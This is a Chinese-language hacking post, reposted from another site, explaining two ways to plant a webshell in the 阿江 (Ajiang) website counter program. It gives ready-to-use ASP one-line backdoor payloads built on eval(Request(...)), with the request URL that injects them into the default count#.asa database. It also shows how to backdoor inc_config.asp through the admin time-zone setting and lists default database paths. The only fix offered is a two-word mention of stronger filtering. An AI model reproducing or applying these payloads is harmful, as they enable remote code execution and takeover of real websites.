一般两种方法:
第一:
前提知道 数据库 路经,并且改成 asp 或asa后缀!阿江计数 程序,可以通过
http://网站 /stat.asp?style=text&referer=代码内容&screenwidth=1024
直 接提交,即可把代码内容直接插入到计数 系统 的数据库中,而此系统默认数据库为count#.asa,我们可以通过http://网站 /count%23.asa访问得到webshell。 由于阿江计数程序过滤了%和+,将最小马改成
<SCRIPT RUNAT=SERVER LANGUAGE=vbSCRIPT>eval(Request(“1″))</SCRIPT>
替换代码 内容处提交,然后用一句话来提交,值得一提的是如果进到计数后台,可以清理某时某刻的数据,一旦插入asp木马失败,可以清理数据库再次操作。某私服内的 啊江统计程序默认的数据库count#.asa
第二:
是进了后台拿shell ,一般有人进了后台不知道怎么搞!
那我情魔就分享下 在系统管理的全局选项中
有个2、服务器所在时区 在里面一般有个8 我们在后面写进 :Eval(request(chr(49)))
成 为 8:Eval(request(chr(49))) 这里49是对应的CHR码你也可以换其他的密码
49对应的是 1 密码就是 1 以前我好象也看到过:Eval(request(chr(112)))什么的 112是p
不过都是转载抄袭写的,写的不明白!
然 后确认修改 我们就用一经常话可以连接了地址是 count/inc_config.asp
http://HdhCmsTestXXX测试数据/count/inc_config.asp
就 这样OK了!…
以上作者:情魔
附:阿江部分默认数据库:count#.asa、#aj.asp(下 载时#号要改为%23)
转载: http://HdhCmsTestwebxiaoz.cn/article/bug/800.htm
修复:加强过滤
查看更多关于阿江统计系统拿WebShell漏洞及修复 - 网站安全 -的详细内容...